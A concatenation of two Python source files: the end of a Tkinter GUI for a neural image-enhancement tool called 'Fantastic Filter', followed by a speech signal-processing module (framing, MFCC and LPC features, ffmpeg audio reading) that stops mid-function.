self.show_origin_btn.config(state="normal")
def enhance_listener(self, *args):
if not (self._check_image() and self._check_model()): return
thread = td.Thread(target=self._enhance_task)
self.status_text.set("增強圖片中..")
self.enhance_pb.start()
try:
self.start_enhance_btn.config(state="disabled")
self.config(cursor='wait')
except Exception as e:
logging.warning(str(e))
thread.start()
self._enhance_handler(thread)
def _resize_height_listener(self, *args):
if not self._check_image(): return
with self.resize_lock:
if self.resizing:
return
self.resizing = True
origin_height, origin_width, _ = np.shape(self._main_image_origin)
resize_height = 0 if not self.resize_height.get() else int(self.resize_height.get())
ratio = resize_height / origin_height
new_width = int(origin_width * ratio)
self.resize_width.set(new_width)
with self.resize_lock:
self.resizing = False
def _resize_width_listener(self, *args):
if not self._check_image(): return
with self.resize_lock:
if self.resizing: return
self.resizing = True
origin_height, origin_width, _ = np.shape(self._main_image_origin)
resize_width = 0 if not self.resize_width.get() else int(self.resize_width.get())
ratio = resize_width / origin_width
new_height = int(origin_height * ratio)
self.resize_height.set(new_height)
with self.resize_lock:
self.resizing = False
def _enhance_task(self):
new_height = int(self.resize_height.get())
new_width = int(self.resize_width.get())
new_height = new_height if new_height is not 0 else 1
new_width = new_width if new_width is not 0 else 1
resize_image = cv2.resize(self._main_image_origin, dsize=(new_width, new_height))
resize_image = resize_image[new_height % 8:, new_width % 8:, :]
enhance_result = self._model.sample(resize_image, denoise=False)
if enhance_result is not None:
self._main_image_enhanced = enhance_result
self._main_image_current_clean = self._main_image_enhanced
def _enhance_handler(self, thread: td.Thread):
if thread.is_alive():
self.after(100, lambda: self._enhance_handler(thread))
else:
self.enhance_pb.stop()
self.start_enhance_btn.config(state="normal")
self.config(cursor='')
if self._model.success:
self.show_enhanced_btn.config(state="disabled")
self.show_origin_btn.config(state="normal")
image = Image.fromarray(np.asarray(self._main_image_enhanced))
self.canvas.set_main_image(image)
self.canvas.request_update()
self.status_text.set("處理完成!")
try:
subprocess.check_output(["notify-send", "圖片處理完成!", "<b>幻想濾鏡™</b>處理好圖片囉!", "--icon=face-glasses"])
except:
logging.warning("can't send notification.")
self.after(3000, lambda: self.status_text.set("就緒"))
else:
pop_msg.showerror("Something went wrong.. ", "圖片處理失敗!\n多數失敗是由於圖片太大張了,把圖片縮小點試試~")
pop_msg.showerror("Something went wrong.. ", self._model.error_log)
self.status_text.set("處理失敗!")
try:
subprocess.check_output(["notify-send", "圖片處理失敗!", "<b>幻想濾鏡™</b>圖片處理失敗了QQ", "--icon=face-sad"])
except:
logging.warning("can't send notification.")
self.after(3000, lambda: self.status_text.set("就緒"))
def open_image_listener(self, *args):
try:
# for Linux
filename = subprocess.check_output(['zenity', '--file-selection']).decode("utf-8").strip()
except FileNotFoundError:
filename = filedialog.askopenfilename()
except subprocess.CalledProcessError:
filename = False
if not filename:
return False
try:
logging.info("open image:", filename)
image = Image.open(filename)
self._main_image_origin = np.asarray(image)
self.canvas.set_main_image(image)
self.canvas.image = image
self._main_image_current_clean = self._main_image_origin
self.canvas.request_update()
self.resize_height.set(image.height)
self.resize_width.set(image.width)
except IOError as e:
logging.error("open image failed!")
logging.error(str(e))
return False
def select_model_listener(self, *kwargs):
model_name = self._model_path_obj.get()
model_path = self._get_model_path(model_name)
self.main_right_model_label.set("使用模型:" + model_name)
if not os.path.isfile(model_path):
model_path = filedialog.askopenfilename(filetypes=(("pre-trained _model", "*.pb"), ("all files", "*.*")))
if not os.path.isfile(model_path):
return False
t_init_model = td.Thread(target=self.init_model, args=(model_path,))
t_init_model.start()
waiting_win = tk.Toplevel(self)
waiting_frame = ttk.Frame(waiting_win)
waiting_frame.pack(fill='both', expand=True, side='top')
waiting_win.lift(aboveThis=self)
waiting_win.geometry("300x130")
waiting_win.resizable(0, 0)
waiting_win.transient(self)
waiting_win.grab_set()
waiting_win.protocol("WM_DELETE_WINDOW", lambda: None)
waiting_win.wm_title("Loading Pre-trained Model")
ttk.Label(waiting_frame, text="\nloading '" + model_name + "' ... \nThis won't take long.\n\n").pack(side='top')
waiting_win.pb = ttk.Progressbar(waiting_frame, length=200, mode="indeterminate", orient=tk.HORIZONTAL)
waiting_win.pb.pack(pady=5)
waiting_win.pb.start()
self.load_model_waiting_win(waiting_win, t_init_model)
def load_model_waiting_win(self, waiting_win: tk.Toplevel, load_thread: td.Thread):
if load_thread.is_alive():
waiting_win.after(100, lambda: self.load_model_waiting_win(waiting_win, load_thread))
else:
waiting_win.pb.stop()
waiting_win.destroy()
def init_model(self, path: str):
try:
self._model.load_model(model_path=path)
except Exception as e:
pop_msg.showerror("Something went wrong.. ", "無法載入模型!")
logging.error(str(e))
def vignette_listener(self, value):
self._vignette_scale = 2. - float(value)
with self._vignette_lock:
self._vignette_should_update = True
def vignette_handler(self):
with self._vignette_lock:
if self._vignette_should_update:
logging.info("update vignette")
if not self._check_image():
return False
else:
if self._vignette_scale >= 1.99:
result_image = self._main_image_current_clean
else:
image = self._main_image_current_clean.copy()
result_image = self.vignette(image, scale=self._vignette_scale)
result_image_pil = Image.fromarray(result_image)
self.canvas.set_main_image(result_image_pil)
self._vignette_should_update = False
self.after(24, self.vignette_handler)
def save(self, *args):
if not self._check_image():
return
path = filedialog.asksaveasfilename(initialfile='enhanced', defaultextension='.png',
filetypes=[("PNG Images", "*.png"), ("JPEG Files", "*.jpg")])
if path:
image = self.canvas.main_image
image.save(path)
def run(self):
'''
try:
# self.call('wm', 'iconphoto', self._w, ImageTk.PhotoImage(Image.open(resource_path('appicon.png'))))
self.iconbitmap(resource_path('appicon.ico'))
except:
pass
'''
self.title("Fantastic Filter")
self.geometry("%dx%d+50+40" % (800, 500))
"""
menu_bar = tk.Menu(self, background='#aaa')
menu_file = tk.Menu(menu_bar, tearoff=0)
menu_edit = tk.Menu(menu_bar, tearoff=0)
menu_help = tk.Menu(menu_bar, tearoff=0)
menu_bar.add_cascade(label='檔案', menu=menu_file)
menu_bar.add_cascade(label='編輯', menu=menu_edit)
menu_bar.add_cascade(label='說明', menu=menu_help)
''' Menu-File '''
menu_file.add_command(label='開啟影像', command=self.open_image_listener)
menu_file.add_command(label='離開', command=self.quit)
''' Menu-Edit '''
# TODO: add menu-edit items
''' Menu-Help '''
menu_help.add_command(label='致謝')
"""
''' toolbar '''
frame_toolbar = ttk.Frame(self)
frame_toolbar.pack(fill='x')
open_image_btn = ttk.Button(frame_toolbar, text="開啟圖片", command=self.open_image_listener)
open_image_btn.pack(side='left', padx=5, pady=8)
select_model_label = ttk.Label(frame_toolbar, text="請選擇模型:")
select_model_label.pack(side='left', padx=(10, 0))
model_cbb = ttk.Combobox(frame_toolbar, textvariable=self._model_path_obj) # 初始化
model_cbb.pack(side='left')
model_cbb["values"] = ['請選擇模型'] + list(map(self._get_model_name, self._get_model_list())) + ['選擇其他模型..']
if len(model_cbb["values"]) > 0:
model_cbb.current(0) # 選擇第一個
model_cbb.bind("<<ComboboxSelected>>", self.select_model_listener) # 绑定事件,(下拉列表框被选中时)
self.show_origin_btn = ttk.Button(frame_toolbar, text="檢視原圖", command=self._show_origin_listener)
self.show_enhanced_btn = ttk.Button(frame_toolbar, text="檢視增強後", command=self._show_enhanced_listener)
self.show_origin_btn.pack(side='left', padx=(10, 0))
self.show_enhanced_btn.pack(side='left', padx=(0, 10))
''' main area '''
# split into 3 part, | load _model,image... | image preview | edit.. save.|
frame_main = ttk.Frame(self)
frame_main.pack(fill='both', expand=True, side='bottom')
'''
self.frame_main_left = ttk.Frame(frame_main)
self.frame_main_left.grid(row=0, column=0, sticky="nsew")
'''
self.frame_main_center = ttk.Frame(frame_main, width=600)
self.frame_main_center.grid(row=0, column=0, sticky='news')
bg = self.style.lookup('TFrame', 'background')
bg = "#e7e7e7" if bg == 'systemWindowBody' else bg
self.canvas = ResizingCanvas(self.frame_main_center, bg=bg, bd=0, highlightthickness=0, relief='ridge')
self.canvas.pack(fill='both', expand=True, pady=10, padx=10)
self.frame_main_right = ttk.Frame(frame_main, width=200)
self.frame_main_right.grid(row=0, column=1, sticky='news', padx=20, pady=20)
frame_fantastic = ttk.Frame(self.frame_main_right)
frame_fantastic.pack(fill='x')
ttk.Label(frame_fantastic, textvariable=self.main_right_model_label).pack(fill='x', pady=5)
self.start_enhance_btn = ttk.Button(frame_fantastic, text="開始處理", command=self.enhance_listener)
self.start_enhance_btn.pack(fill='x', expand=True)
self.enhance_pb = ttk.Progressbar(frame_fantastic, length=160, mode="indeterminate", orient=tk.HORIZONTAL)
self.enhance_pb.pack(fill='x', pady=5)
ttk.Separator(self.frame_main_right, orient='horizontal').pack(fill='x', pady=10)
frame_resize = ttk.Frame(self.frame_main_right)
frame_resize.pack()
ttk.Label(frame_resize, text="寬/高").pack(fill='x')
frame_resize_inputs = ttk.Frame(frame_resize)
frame_resize_inputs.pack()
self.input_resize_height = ttk.Entry(frame_resize_inputs, textvariable=self.resize_height, validate='key',
validatecommand=(self.register(isnumeric_or_blank), "%P"), width=9)
self.input_resize_width = ttk.Entry(frame_resize_inputs, textvariable=self.resize_width, validate='key',
validatecommand=(self.register(isnumeric_or_blank), "%P"), width=9)
self.input_resize_width.pack(side='left', padx=(0, 4))
self.input_resize_height.pack(side='right', padx=(4, 0))
ttk.Separator(self.frame_main_right, orient='horizontal').pack(fill='x', pady=10)
frame_controls_vignette = ttk.Frame(self.frame_main_right)
# frame_controls_vignette.pack(fill='x')
controls_vignette_label = ttk.Label(frame_controls_vignette, text='暈影')
controls_vignette_label.pack(fill='x')
controls_vignette_scale = ttk.Scale(frame_controls_vignette, length=160, command=self.vignette_listener)
controls_vignette_scale.pack(fill='x', ipadx=5)
# ttk.Separator(self.frame_main_right, orient='horizontal').pack(fill='x', pady=10)
frame_save = ttk.Frame(self.frame_main_right)
frame_save.pack(fill='x', pady=10)
ttk.Button(frame_save, text='儲存', command=self.save).pack(fill='x', expand=True)
tk.Grid.rowconfigure(frame_main, 0, weight=1)
tk.Grid.columnconfigure(frame_main, 0, weight=1)
self.style.configure('gary.TFrame', background="#eaeaea")
self.style.configure('gary.TLabel', background="#eaeaea")
frame_status = ttk.Frame(frame_main, style='gary.TFrame')
frame_status.grid(row=2, column=0, columnspan=2, sticky="nwes")
status_bar = ttk.Label(frame_status, textvariable=self.status_text, style='gary.TLabel')
status_bar.pack(side='left', padx=5, pady=0)
# self.config(menu=menu_bar)
self.bind_all("<Command-o>", self.open_image_listener)
self.bind_all("<Control-o>", self.open_image_listener)
self.bind_all("<Command-s>", self.save)
self.bind_all("<Control-s>", self.save)
self.mainloop()
@staticmethod
def vignette(image, scale):
# every numpy array has a shape tuple
width, height = image.shape[:2]
xs = np.arange(width)
ys = np.arange(height)
distance_squared = (xs - width / 2.0)[..., np.newaxis] ** 2 + (ys - height / 2.0) ** 2
sigma_squared = (width / 2.0) ** 2 + (height / 2.0) ** 2
sigma_squared /= 2
mask = np.exp(-distance_squared / sigma_squared)
# the easiest way to control the strength of the mask
# the easiest way to control the strength of the mask
scale_revers = 1 / scale
new_h = int(mask.shape[0] * scale_revers)
new_w = int(mask.shape[1] * scale_revers)
y_start = int((mask.shape[0] - new_h) / 2)
x_start = int((mask.shape[1] - new_w) / 2)
mask_new = mask.copy()[x_start:new_h, y_start:new_w]
mask_new = cv2.resize(mask_new, (mask.shape[1], mask.shape[0]))
result = image * mask_new[..., np.newaxis]
return np.uint8(result)
def _check_model(self):
if not self._model_loaded():
pop_msg.showinfo("Hmm..", "請先選擇模型!")
return False
else:
return True
def _check_image(self):
if not self._image_loaded():
pop_msg.showinfo("Umm..", "請先開啟圖片!")
return False
else:
return True
def _get_model_list(self):
base_dir = self.model_dir
return glob.glob(base_dir + "/*.pb")
@staticmethod
def _get_model_name(path):
return os.path.basename(path.replace(".pb", ''))
def _get_model_path(self, name):
return self.model_dir + '/' + name + ".pb"
def isnumeric_or_blank(my_str: str):
return my_str.isnumeric() or my_str == ''
class ResizingCanvas(tk.Canvas):
image: PhotoImage
def __init__(self, parent, **args):
super().__init__(parent, args)
self.main_image = None
self.width = self.winfo_width()
self.height = self.winfo_height()
self.lock = RLock()
self._should_update = False
self.bind("<Configure>", self.on_resize)
self._update_handler()
self.main_image_tk = None
self.image_pi = None
def _update_handler(self, interval=200):
with self.lock:
if self._should_update:
self.update_now()
self._should_update = False
self.after(interval, lambda: self._update_handler(interval))
def on_resize(self, event):
self.request_update()
# self.update()
def request_update(self):
with self.lock:
self._should_update = True
def update_now(self, *args):
self.width = self.winfo_width()
self.height = self.winfo_height()
image = self.main_image
if image is not None:
w, h = image.size
scale = min((self.width / w), (self.height / h))
image_resize = image.resize((int(w * scale), (int(h * scale))), Image.ANTIALIAS)
self.image_pi = ImageTk.PhotoImage(image=image_resize)
# self.delete("all")
self.main_image_tk = self.create_image(self.width / 2, self.height / 2, anchor='center',
image=self.image_pi)
self.image = self.image_pi
self.update()
def set_main_image(self, image: Image):
if self.image_pi is not None:
w, h = image.size
scale = min((self.width / w), (self.height / h))
image_resize = image.resize((int(w * scale), (int(h * scale))), Image.ANTIALIAS)
self.image = image_resize
self.image_pi = ImageTk.PhotoImage(image=image_resize)
self.itemconfigure(self.main_image_tk, image=self.image_pi)
# self.image = image
self.main_image = image
def resource_path(relative_path):
if hasattr(sys, '_MEIPASS'):
return sys._MEIPASS + '/' + relative_path
return os.path.join(os.path.dirname(os.path.abspath(__file__)), relative_path)
if __name__ == '__main__':
app = APP()
app.run()
|
sigproc.py
|
# https://github.com/jameslyons/python_speech_features
# This file includes routines for basic signal processing including framing and computing power spectra.
# Author: James Lyons 2012
#
# This file was updated with additional speech processing routines for feature extraction, such as MFCC and LPC
# Author: Anurag Chowdhury 2020
import sys, os
import decimal
import numpy as np
import math
import logging
import librosa as lr
from scipy import fix, signal, stats
import subprocess as sp
from threading import Thread
from queue import Queue, Empty
import random
import hdf5storage
from IPython.display import Audio
import librosa
## IGRNORES WARNINGS
import warnings
print('TURNING OFF WARNINGS in tools/sigproc.py!!')
warnings.filterwarnings("ignore")
def round_half_up(number):
return int(decimal.Decimal(number).quantize(decimal.Decimal('1'), rounding=decimal.ROUND_HALF_UP))
def rolling_window(a, window, step=1):
# http://ellisvalentiner.com/post/2017-03-21-np-strides-trick
shape = a.shape[:-1] + (a.shape[-1] - window + 1, window)
strides = a.strides + (a.strides[-1],)
return np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)[::step]
def framesig(sig, frame_len, frame_step, winfunc=lambda x: np.ones((x,)), stride_trick=True):
"""Frame a signal into overlapping frames.
:param sig: the audio signal to frame.
:param frame_len: length of each frame measured in samples.
:param frame_step: number of samples after the start of the previous frame that the next frame should begin.
:param winfunc: the analysis window to apply to each frame. By default no window is applied.
:param stride_trick: use stride trick to compute the rolling window and window multiplication faster
:returns: an array of frames. Size is NUMFRAMES by frame_len.
"""
slen = len(sig)
frame_len = int(round_half_up(frame_len))
frame_step = int(round_half_up(frame_step))
if slen <= frame_len:
numframes = 1
else:
numframes = 1 + int(math.ceil((1.0 * slen - frame_len) / frame_step)) # LV
padlen = int((numframes - 1) * frame_step + frame_len)
zeros = np.zeros((padlen - slen,))
padsignal = np.concatenate((sig, zeros))
if stride_trick:
win = winfunc(frame_len)
frames = rolling_window(padsignal, window=frame_len, step=frame_step)
else:
indices = np.tile(np.arange(0, frame_len), (numframes, 1)) + np.tile(
np.arange(0, numframes * frame_step, frame_step), (frame_len, 1)).T
indices = np.array(indices, dtype=np.int32)
frames = padsignal[indices]
win = np.tile(winfunc(frame_len), (numframes, 1))
return frames * win
def deframesig(frames, siglen, frame_len, frame_step, winfunc=lambda x: np.ones((x,))):
"""Does overlap-add procedure to undo the action of framesig.
:param frames: the array of frames.
:param siglen: the length of the desired signal, use 0 if unknown. Output will be truncated to siglen samples.
:param frame_len: length of each frame measured in samples.
:param frame_step: number of samples after the start of the previous frame that the next frame should begin.
:param winfunc: the analysis window to apply to each frame. By default no window is applied.
:returns: a 1-D signal.
"""
frame_len = round_half_up(frame_len)
frame_step = round_half_up(frame_step)
numframes = np.shape(frames)[0]
assert np.shape(frames)[1] == frame_len, '"frames" matrix is wrong size, 2nd dim is not equal to frame_len'
indices = np.tile(np.arange(0, frame_len), (numframes, 1)) + np.tile(
np.arange(0, numframes * frame_step, frame_step), (frame_len, 1)).T
indices = np.array(indices, dtype=np.int32)
padlen = (numframes - 1) * frame_step + frame_len
if siglen <= 0: siglen = padlen
rec_signal = np.zeros((padlen,))
window_correction = np.zeros((padlen,))
win = winfunc(frame_len)
for i in range(0, numframes):
window_correction[indices[i, :]] = window_correction[
indices[i, :]] + win + 1e-15 # add a little bit so it is never zero
rec_signal[indices[i, :]] = rec_signal[indices[i, :]] + frames[i, :]
rec_signal = rec_signal / window_correction
return rec_signal[0:siglen]
def magspec(frames, NFFT):
"""Compute the magnitude spectrum of each frame in frames. If frames is an NxD matrix, output will be Nx(NFFT/2+1).
:param frames: the array of frames. Each row is a frame.
:param NFFT: the FFT length to use. If NFFT > frame_len, the frames are zero-padded.
:returns: If frames is an NxD matrix, output will be Nx(NFFT/2+1). Each row will be the magnitude spectrum of the corresponding frame.
"""
if np.shape(frames)[1] > NFFT:
logging.warn(
'frame length (%d) is greater than FFT size (%d), frame will be truncated. Increase NFFT to avoid.',
np.shape(frames)[1], NFFT)
complex_spec = np.fft.rfft(frames, NFFT)
return np.absolute(complex_spec)
def powspec(frames, NFFT):
"""Compute the power spectrum of each frame in frames. If frames is an NxD matrix, output will be Nx(NFFT/2+1).
:param frames: the array of frames. Each row is a frame.
:param NFFT: the FFT length to use. If NFFT > frame_len, the frames are zero-padded.
:returns: If frames is an NxD matrix, output will be Nx(NFFT/2+1). Each row will be the power spectrum of the corresponding frame.
"""
return 1.0 / NFFT * np.square(magspec(frames, NFFT))
def logpowspec(frames, NFFT, norm=1):
"""Compute the log power spectrum of each frame in frames. If frames is an NxD matrix, output will be Nx(NFFT/2+1).
:param frames: the array of frames. Each row is a frame.
:param NFFT: the FFT length to use. If NFFT > frame_len, the frames are zero-padded.
:param norm: If norm=1, the log power spectrum is normalised so that the max value (across all frames) is 0.
:returns: If frames is an NxD matrix, output will be Nx(NFFT/2+1). Each row will be the log power spectrum of the corresponding frame.
"""
ps = powspec(frames, NFFT);
ps[ps <= 1e-30] = 1e-30
lps = 10 * np.log10(ps)
if norm:
return lps - np.max(lps)
else:
return lps
def preemphasis(signal, coeff=0.95):
"""perform preemphasis on the input signal.
:param signal: The signal to filter.
:param coeff: The preemphasis coefficient. 0 is no filter, default is 0.95.
:returns: the filtered signal.
"""
return np.append(signal[0], signal[1:] - coeff * signal[:-1])
def normalize_audio(file_data, classes=256):
file_data = lr.util.normalize(file_data)
quantized_data = quantize_data(file_data, classes)
return quantized_data
def normalize_frame(frame, axis = 0):
min_val = np.expand_dims(np.amin(frame,axis = 0),axis=0)
min_frame = np.tile(min_val, [frame.shape[0],1])
max_val = np.expand_dims(np.amax(frame,axis = 0),axis=0)
max_frame = np.tile(max_val, [frame.shape[0],1])
frame_normalized =(frame-min_frame)/(max_frame-min_frame)
return frame_normalized
def generate_audio(audio_vec, classes=256):
# bins_0_1 = np.linspace(0, 1, classes)
# audio_vec = np.digitize(audio_vec, bins_0_1) - 1
generated = audio_vec
# generated = (audio_vec / classes) * 2. - 1
mu_gen = mu_law_expansion(generated, classes)
return mu_gen
def quantize_data(data, classes):
mu_x = mu_law_encoding(data, classes)
bins = np.linspace(-1, 1, classes)
#quantized = mu_x
quantized = np.digitize(mu_x, bins) - 1
#bins_0_1 = np.linspace(0, 1, classes)
#quantized = bins_0_1[quantized]
return quantized
def mu_law_encoding(data, mu):
mu_x = np.sign(data) * np.log(1 + mu * np.abs(data)) / np.log(mu + 1)
return mu_x
def mu_law_expansion(data, mu):
s = np.sign(data) * (np.exp(np.abs(data) * np.log(mu + 1)) - 1) / mu
return s
def read_frame_from_file(filepath):
# filepath = '/scratch2/chowdh51/Data/degradedTIMIT/P3/eval/FADG0/SA1.mat'
mat = hdf5storage.loadmat(filepath)
frame = np.array(mat['data'])
return frame
def frame_to_audio(frame, win):
inv_win = 1/win
inv_win = np.expand_dims(inv_win, axis=1)
inv_win = np.tile(inv_win, (1,frame.shape[1]))
frame = frame * inv_win
tmp= frame[int((frame.shape[0])/2):,1:]
b = np.reshape(tmp.transpose(),(1,tmp.shape[0]*tmp.shape[1])).flatten()
audio = np.concatenate((frame[:,0], b), axis=0)
return audio
def audio_to_frame(audio, win=signal.boxcar(160), inc=80):
## Same as obspy.signal.util.enframe
nx = len(audio)
nwin = len(win)
if (nwin == 1):
length = win
else:
length = nwin
nf = int(fix((nx - length + inc) // inc))
indf = inc * np.arange(nf)
inds = np.arange(length) + 1
f = audio[(np.transpose(np.vstack([indf] * length)) +
np.vstack([inds] * nf)).astype(int) - 1]
if (nwin > 1):
w = np.transpose(win)
f = f * np.vstack([w] * nf)
f = np.transpose(f)
return f
def get_frame_from_file(file_path, sr=8000, duration = None, n_channels=1, classes=256, win=signal.boxcar(160), inc=80):
## Read Audio
if(isinstance(file_path, np.ndarray)):
file_data = file_path
else:
filename, file_extension = os.path.splitext(file_path)
if(file_extension == '.mat'):
mat = hdf5storage.loadmat(file_path)
file_data = np.array(mat['audio']).flatten()
fs = np.asscalar(np.array(mat['fs']))
file_data = signal.resample(file_data, int(file_data.shape[0]*(sr/fs)))
elif(duration is None):
file_data, _ = lr.load(path=file_path, sr=sr, duration = duration, mono=n_channels==1)
else:
file_data = read_audio(file_path, sampling_rate=sr, duration = duration, n_channels=n_channels)
## Normalize Audio for input to CNN
# normalized_audio = normalize_audio(file_data, classes=classes)
normalized_audio = file_data
## Enframe Normalized Audio
frame = audio_to_frame(normalized_audio, win, inc)
# frame = frame[:,~np.all(frame == 0, axis=0)]
frame = frame[:,~(frame.sum(axis=0) == 0)] ## Remove all zero-only speech units(columns)
## axis=1 ensure normalization across frames
## axis=0 ensure normalization within frames (as done for taslp work)
# frame= stats.zscore(frame, axis=0, ddof=1)
frame = frame[:,~np.any(np.isnan(frame), axis=0)]
frame = frame[:,~np.any(np.isinf(frame), axis=0)]
## Random crop transform
# if(frame.shape[1]>200):
# idx = random.randint(0,frame.shape[1]-200)
# frame = frame[:,idx:idx+200]
return frame
def get_audio_from_frame(frame, win=signal.boxcar(160), classes=256):
## Convert frame to audio
audio_vec = frame_to_audio(frame,win)
## Convert Normalized audio back to un-Normalized audio
# gen_audio = generate_audio(audio_vec, classes=classes)
gen_audio = audio_vec
return gen_audio
def read_audio_blocking(file_path, sampling_rate = 8000, format = 's16le', acodec = 'pcm_s16le', mono = 1, bufsize=10**8, n_channels = 1, duration = 2.01):
byte_per_frame = 2
FFMPEG_BIN = "ffmpeg"
command = [ FFMPEG_BIN,
'-i', file_path,
'-f', format,
'-acodec', acodec,
'-ar', str(sampling_rate), # ouput will have 'sampling_rate' Hz
'-ac', str(n_channels), # (set to '1' for mono; '2' for stereo)
'-']
pipe = sp.Popen(command, stdout=sp.PIPE, bufsize=bufsize)
raw_audio = pipe.stdout.read(np.ceil(sampling_rate*duration*n_channels*byte_per_frame).astype(int))
audio_array = np.fromstring(raw_audio, dtype="int16")
audio_array = audio_array.astype(np.float32, order='C') / 32768.0
return audio_array
def enqueue_output(out, queue, buf_size):
queue.put(out.read(np.ceil(buf_size).astype(int)))
out.close()
def read_audio(file_path, sampling_rate = 8000, format = 's16le', acodec = 'pcm_s16le', bufsize=10**4, n_channels = 1, duration = 2.01):
byte_per_frame = 2
FFMPEG_BIN = "ffmpeg"
ON_POSIX = 'posix' in sys.builtin_module_names
buf_size_2_read = sampling_rate*duration*n_channels*byte_per_frame
command = [ FFMPEG_BIN,
'-i', file_path,
'-f', format,
'-acodec', acodec,
'-ar', str(sampling_rate), # ouput will have 'sampling_rate' Hz
'-ac', str(n_channels), # (set to '1' for mono; '2' for stereo)
'-']
pipe = sp.Popen(command, stdout=sp.PIPE, bufsize=bufsize, close_fds=ON_POSIX)
q = Queue()
t = Thread(target=enqueue_output, args=(pipe.stdout, q, buf_size_2_read))
t.daemon = True # thread dies with the program
t.start()
# read line without blocking
# raw_audio = q.get_nowait()
# audio_array = np.fromstring(raw_audio, dtype="int16")
# audio_array = audio_array.astype(np.float32, order='C') / 32768.0
audio_array = None
try: raw_audio = q.get() # or q.get_nowait(), q.get(timeout=.1)
except Empty:
print('Failed to read audio!!')
else:
audio_array = np.fromstring(raw_audio, dtype="int16")
audio_array = audio_array.astype(np.float32, order='C') / 32768.0
return audio_array
def get_lpc_feature(input_audio, sampling_rate, order = 20, preemphasis = True, includeDerivatives = True, win = np.hamming(160), inc = 80):
# audio, sr = librosa.load(input_audio, sr=sampling_rate)
audio = input_audio
# Pre-emphasis filter (zero is at 50 Hz)
if(preemphasis):
audio = signal.lfilter([1, -np.exp(-2*np.pi*50/sampling_rate)],1,audio)
# Get frames from input audio
frame = get_frame_from_file(audio, win=win, inc=inc, sr=sampling_rate, n_channels=1, duration = None)
c = np.zeros((frame.shape[1], order))
# Compute LPC coefficients
for i in range(c.shape[0]):
lpc_ftr = librosa.lpc(frame[:,i], order)
c[i,:] = lpc_ftr[1:]
nf = c.shape[0]
# Calculate derivative
if(includeDerivatives):
vf=np.arange(4,-5,-1)/60
ww=np.zeros(4, dtype=int)
cx = np.vstack((c[ww,:], c, c[(nf-1)*(ww+1),:]))
filtered_cx = signal.lfilter(vf,1,np.transpose(cx).flatten())
dc = np.reshape(filtered_cx,(nf+8,order),order='F')
dc = np.delete(dc, np.arange(0,8), axis=0)
c = np.hstack((c,dc))
c = np.transpose(c)
c = c.astype(np.single)
return c
def mel2frq(mel):
k = 1000/np.log(1+1000/700)
amel = np.absolute(mel)
frq = np.multiply(700*np.sign(mel), (np.exp(amel/k)-1))
return frq
def frq2mel(frq):
k = 1000/np.log(1+1000/700)
af = np.absolute(frq)
mel = np.multiply(np.sign(frq), np.log(1+af/700)*k)
return mel
def melbankm(sr, n_mels, n_fft, fmin, fmax):
melfb = librosa.filters.mel(sr = sr, n_fft = n_fft,
n_mels = n_mels, fmin = fmin, fmax = fmax, norm = None, htk = True)
melfb = melfb[:,1:melfb.shape[1]-1]*2 ## The scaling factor of 2 is used to match the result to VOICEBOX toolkit's MATLAB implementation
frq = [fmin, fmax]
mflh = frq2mel(frq)
melrng = np.matmul(mflh , np.arange(-1,2,2))
melinc = melrng/(n_mels+1)
blim = mel2frq(mflh[0]+np.multiply([0, 1, n_mels, n_mels+1],melinc))*n_fft/sr
b1 = int(np.floor(blim[0])+1)
b4 = int(np.minimum(np.floor(n_fft/2),np.ceil(blim[3])-1))
pf = (frq2mel(np.arange(b1,b4+1)*sr/n_fft)-mflh[0])/melinc
# remove any incorrect entries in pf due to rounding errors
if(pf[0]<0):
pf = np.delete(pf, (0), axis=0)
b1=b1+1
if (pf[-1]>=n_mels+1):
pf = np.delete(pf, (-1), axis=0)
b4=b4-1;
mn = b1 + 1
mx = b4 + 1
return (melfb, mn, mx)
def rdct(x):
fl=x.shape[0]==1
if(fl):
x=x.flatten()
[m,k]=x.shape
n=m
b=1
a=np.sqrt(2*n)
x=np.vstack((x[0:n+1:2,:], x[2*int(np.fix(n/2))-1:0:-2,:]))
z=np.transpose(np.concatenate(([np.sqrt(2)], 2*np.exp((-0.5j*np.pi/n)*(np.arange(1,n))))))
y=np.real(np.multiply(np.fft.fft(x,n=x.shape[0],axis=0),np.transpose(np.tile(z,(k,1)))))/a
if(fl):
y=np.transpose(y)
return y
def get_mfcc_feature(input_audio, sampling_rate, order = 20, preemphasis = True, includeDerivatives = True, win = np.hamming(160), inc = 80):
# audio, sr = librosa.load(input_audio, sr=sampling_rate)
# win = np.hamming(int(sampling_rate*0.02))
# inc = int(win.shape[0]/2)
# Pre-emphasis filter (zero is at 50 Hz)
if(preemphasis):
input_audio = signal.lfilter([1, -np.exp(-2*np.pi*50/sampling_rate)],1,input_audio)
# Get frames from input audio
frame = get_frame_from_file(input_audio, win=win, inc=inc, sr=sampling_rate, n_channels=1, duration = None)
c = np.zeros((frame.shape[1], order))
## Compute FFT
f = np.fft.rfft(frame, n=frame.shape[0], axis=0)
## Get the Mel-filterbanks
sr = sampling_rate
n_mels = int(np.floor(3*np.log(sampling_rate)))
n_fft = int(sampling_rate*0.02)
fmin = 0 * sampling_rate
fmax = 0.5 * sampling_rate
[m,a,b] = melbankm(sr, n_mels, n_fft, fmin, fmax)
pw = np.multiply(f[a-1:b,:], np.conj(f[a-1:b,:]))
pw = pw.real
pth = np.max(pw.flatten())*1E-20
## Apply DCT
ath = np.sqrt(pth)
y = np.log(np.maximum(np.matmul(m,np.absolute(f[a-1:b,:])),ath))
c = np.transpose(rdct(y))
nf = c.shape[0]
nc = order
if n_mels>nc:
c = c[:,0:nc]
elif n_mels<nc:
c = np.hstack((c, np.zeros(nf,nc-n_mels)))
# Calculate derivative
if(includeDerivatives):
vf=np.arange(4,-5,-1)/60
ww=np.zeros(4, dtype=int)
cx = np.vstack((c[ww,:], c, c[(nf-1)*(ww+1),:]))
filtered_cx = signal.lfilter(vf,1,np.transpose(cx).flatten())
dc = np.reshape(filtered_cx,(nf+8,order),order='F')
dc = np.delete(dc, np.arange(0,8), axis=0)
c = np.hstack((c,dc))
c = np.transpose(c)
c = c.astype(np.single)
return c
def cmvn(x):
mu = np.mean(x, axis=1)
stdev = np.std(x, axis=1)
f = np.subtract(x, np.transpose(np.tile(mu,(x.shape[1],1))))
f = np.divide(f, np.transpose(np.tile(stdev,(x.shape[1],1))))
return f
def get_mfcc_lpc_feature(input_audio, sampling_rate, order = 20, preemphasis = True, includeDerivatives = True, win = np.hamming(160), inc = 80):
mfcc_ftr = get_mfcc_feature(input_audio, sampling_rate, order = order, preemphasis = preemphasis, includeDerivatives = includeDerivatives, win = win, inc = inc)
